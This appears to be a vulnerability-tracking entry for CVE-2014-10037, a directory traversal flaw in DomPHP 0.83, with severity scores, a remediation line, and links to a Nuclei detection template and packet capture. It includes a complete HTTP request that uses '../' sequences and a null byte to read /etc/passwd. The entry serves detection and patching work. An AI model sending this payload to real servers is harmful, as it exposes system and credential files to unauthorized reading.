| Title | DomPHP 0.83 - Directory Traversal |
|---|---|
| Author | daffainfo |
| Severity | High |
| Impact | An attacker can read, modify, or delete sensitive files on the server, potentially leading to unauthorized access or data leakage. |
| Remediation | Upgrade to a patched version of DomPHP or apply the necessary security patches to fix the directory traversal vulnerability. |
| CVSS Score | 7.5 |
| EPSS Score | 0.72691 |
| CVE ID | CVE-2014-10037 |
| CWE ID | CWE-22 |
| Tags | cve2014 cve lfi edb domphp vuln |
A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a .. (dot dot) in the url parameter to photoalbum/index.php.
GET /photoalbum/index.php?urlancien&url=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2014/CVE-2014-10037.yaml
🦈 Packet Capture: ⬇️ Download cve-2014-10037.pcap
N/AN/A